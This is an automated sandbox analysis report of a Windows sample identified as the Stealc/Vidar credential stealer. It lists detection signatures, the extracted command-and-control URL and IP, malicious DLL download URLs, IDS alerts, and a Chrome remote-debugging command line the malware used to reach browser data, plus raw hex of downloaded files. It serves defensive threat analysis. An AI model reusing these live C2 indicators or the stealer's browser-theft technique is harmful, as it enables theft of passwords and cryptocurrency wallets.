Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
test.exe

Overview

General Information

Sample name:test.exe
Analysis ID:1633117
MD5:e4e0140934b3661ae96f53b7face5b44
SHA1:284f1305ac3fee0545cf62a4303eac8a888f16a8
SHA256:c38a2d4032e4c1bc63e92b2ac0569f5454ea4a22f586a7832f985886308f1415
Tags:exeuser-BastianHein
Infos:

Detection

Stealc, Vidar
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Joe Sandbox ML detected suspicious sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Browser Started with Remote Debugging
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • test.exe (PID: 7748 cmdline: "C:\Users\user\Desktop\test.exe" MD5: E4E0140934B3661AE96F53B7FACE5B44)
    • chrome.exe (PID: 8076 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="" MD5: E81F54E6C1129887AEA47E7D092680BF)
      • chrome.exe (PID: 7436 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2288,i,7698725374925482900,7061072673800453571,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2320 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://45.93.20.28/85a1cacf11314eb8.php"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1455667853.0000000000AB1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1456721417.000000000178E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.1168966295.0000000005420000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: test.exe PID: 7748JoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            Process Memory Space: test.exe PID: 7748JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              Click to see the 2 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Browser Started with Remote Debugging
              Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\test.exe", ParentImage: C:\Users\user\Desktop\test.exe, ParentProcessId: 7748, ParentProcessName: test.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", ProcessId: 8076, ProcessName: chrome.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-09T22:03:15.510443+010020442451Malware Command and Control Activity Detected45.93.20.2880192.168.2.449717TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-09T22:03:15.503668+010020442441Malware Command and Control Activity Detected192.168.2.44971745.93.20.2880TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-09T22:03:15.724339+010020442461Malware Command and Control Activity Detected192.168.2.44971745.93.20.2880TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-09T22:03:16.885183+010020442481Malware Command and Control Activity Detected192.168.2.44971745.93.20.2880TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-09T22:03:15.731526+010020442471Malware Command and Control Activity Detected45.93.20.2880192.168.2.449717TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-09T22:03:15.278982+010020442431Malware Command and Control Activity Detected192.168.2.44971745.93.20.2880TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-09T22:03:17.687350+010028033043Unknown Traffic192.168.2.44971745.93.20.2880TCP
              2025-03-09T22:03:32.232344+010028033043Unknown Traffic192.168.2.44974345.93.20.2880TCP
              2025-03-09T22:03:33.244289+010028033043Unknown Traffic192.168.2.44974345.93.20.2880TCP
              2025-03-09T22:03:33.872322+010028033043Unknown Traffic192.168.2.44974345.93.20.2880TCP
              2025-03-09T22:03:34.432963+010028033043Unknown Traffic192.168.2.44974345.93.20.2880TCP
              2025-03-09T22:03:36.134484+010028033043Unknown Traffic192.168.2.44974345.93.20.2880TCP
              2025-03-09T22:03:36.685364+010028033043Unknown Traffic192.168.2.44974345.93.20.2880TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: test.exeAvira: detected
              Antivirus detection for URL or domain
              Source: http://45.93.20.28/85a1cacf11314eb8.phpexodus.conf.jsonniAvira URL Cloud: Label: malware
              Source: http://45.93.20.28/c66c0eade263c9a8/softokn3.dllyAvira URL Cloud: Label: malware
              Source: http://45.93.20.28/85a1cacf11314eb8.phpCashAvira URL Cloud: Label: malware
              Source: http://45.93.20.28/c66c0eade263c9a8/msvcp140.dllEAvira URL Cloud: Label: malware
              Source: http://45.93.20.28/c66c0eade263c9a8/nss3.dllllzAvira URL Cloud: Label: malware
              Source: http://45.93.20.28/85a1cacf11314eb8.phpJAvira URL Cloud: Label: malware
              Source: http://45.93.20.28Avira URL Cloud: Label: malware
              Source: http://45.93.20.28/c66c0eade263c9a8/sqlite3.dllBgAvira URL Cloud: Label: malware
              Source: http://45.93.20.28/Avira URL Cloud: Label: malware
              Source: http://45.93.20.28/c66c0eade263c9a8/vcruntime140.dllAvira URL Cloud: Label: malware
              Source: http://45.93.20.28/c66c0eade263c9a8/msvcp140.dll#Avira URL Cloud: Label: malware
              Source: http://45.93.20.28/c66c0eade263c9a8/nss3.dll;Avira URL Cloud: Label: malware
              Source: http://45.93.20.28/85a1cacf11314eb8.phpc_qtAvira URL Cloud: Label: malware
              Source: http://45.93.20.28/c66c0eade263c9a8/vcruntime140.dllKAvira URL Cloud: Label: malware
              Source: http://45.93.20.28/85a1cacf11314eb8.phpStarAvira URL Cloud: Label: malware
              Source: http://45.93.20.28/85a1cacf11314eb8.php)Avira URL Cloud: Label: malware
              Source: http://45.93.20.28/c66c0eade263c9a8/nss3.dll6Avira URL Cloud: Label: malware
              Source: http://45.93.20.28/c66c0eade263c9a8/msvcp140.dll1Avira URL Cloud: Label: malware
              Source: http://45.93.20.28/c66c0eade263c9a8/msvcp140.dllAvira URL Cloud: Label: malware
              Source: http://45.93.20.28/85a1cacf11314eb8.phpsAvira URL Cloud: Label: malware
              Source: http://45.93.20.28/c66c0eade263c9a8/freebl3.dllAvira URL Cloud: Label: malware
              Source: http://45.93.20.28/c66c0eade263c9a8/softokn3.dll5Avira URL Cloud: Label: malware
              Source: http://45.93.20.28/c66c0eade263c9a8/nss3.dll_Avira URL Cloud: Label: malware
              Source: http://45.93.20.28/c66c0eade263c9a8/sqlite3.dllAvira URL Cloud: Label: malware
              Source: http://45.93.20.28/c66c0eade263c9a8/mozglue.dlldAvira URL Cloud: Label: malware
              Source: http://45.93.20.28/c66c0eade263c9a8/nss3.dllAvira URL Cloud: Label: malware
              Source: http://45.93.20.28/85a1cacf11314eb8.phpJ:Avira URL Cloud: Label: malware
              Source: http://45.93.20.28/c66c0eade263c9a8/softokn3.dllAvira URL Cloud: Label: malware
              Source: http://45.93.20.28/c66c0eade263c9a8/softokn3.dllQAvira URL Cloud: Label: malware
              Source: http://45.93.20.28/85a1cacf11314eb8.phpb:Avira URL Cloud: Label: malware
              Source: http://45.93.20.28/c66c0eade263c9a8/nss3.dllowserAvira URL Cloud: Label: malware
              Source: http://45.93.20.28/85a1cacf11314eb8.phpAvira URL Cloud: Label: malware
              Source: http://45.93.20.28/c66c0eade263c9a8/nss3.dllataAvira URL Cloud: Label: malware
              Source: http://45.93.20.28/85a1cacf11314eb8.phpdgeAvira URL Cloud: Label: malware
              Source: http://45.93.20.28/85a1cacf11314eb8.phpdAvira URL Cloud: Label: malware
              Source: http://45.93.20.28/c66c0eade263c9a8/mozglue.dllXglAvira URL Cloud: Label: malware
              Source: http://45.93.20.28/85a1cacf11314eb8.phpkAvira URL Cloud: Label: malware
              Source: http://45.93.20.28/c66c0eade263c9a8/mozglue.dllAvira URL Cloud: Label: malware
              Source: http://45.93.20.28/c66c0eade263c9a8/nss3.dllllAvira URL Cloud: Label: malware
              Found malware configuration
              Source: 00000000.00000002.1456721417.000000000178E000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://45.93.20.28/85a1cacf11314eb8.php"}
              Multi AV Scanner detection for submitted file
              Source: test.exeReversingLabs: Detection: 60%
              Source: test.exeVirustotal: Detection: 64%Perma Link
              Joe Sandbox ML detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCC6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,0_2_6CCC6C80
              Source: test.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.4:49745 version: TLS 1.2
              Source: Binary string: mozglue.pdbP source: test.exe, 00000000.00000002.1470973984.000000006CD2D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
              Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
              Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
              Source: Binary string: nss3.pdb@ source: test.exe, 00000000.00000002.1471186025.000000006CEEF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
              Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
              Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
              Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
              Source: Binary string: nss3.pdb source: test.exe, 00000000.00000002.1471186025.000000006CEEF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
              Source: Binary string: mozglue.pdb source: test.exe, 00000000.00000002.1470973984.000000006CD2D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
              Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
              Source: C:\Users\user\Desktop\test.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
              Source: C:\Users\user\Desktop\test.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
              Source: C:\Users\user\Desktop\test.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
              Source: C:\Users\user\Desktop\test.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
              Source: C:\Users\user\Desktop\test.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
              Source: C:\Users\user\Desktop\test.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
              Source: chrome.exeMemory has grown: Private usage: 0MB later: 40MB

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49717 -> 45.93.20.28:80
              Source: Network trafficSuricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49717 -> 45.93.20.28:80
              Source: Network trafficSuricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 45.93.20.28:80 -> 192.168.2.4:49717
              Source: Network trafficSuricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49717 -> 45.93.20.28:80
              Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 45.93.20.28:80 -> 192.168.2.4:49717
              Source: Network trafficSuricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49717 -> 45.93.20.28:80
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: http://45.93.20.28/85a1cacf11314eb8.php
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 09 Mar 2025 21:03:17 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 09 Mar 2025 21:03:32 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 09 Mar 2025 21:03:33 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 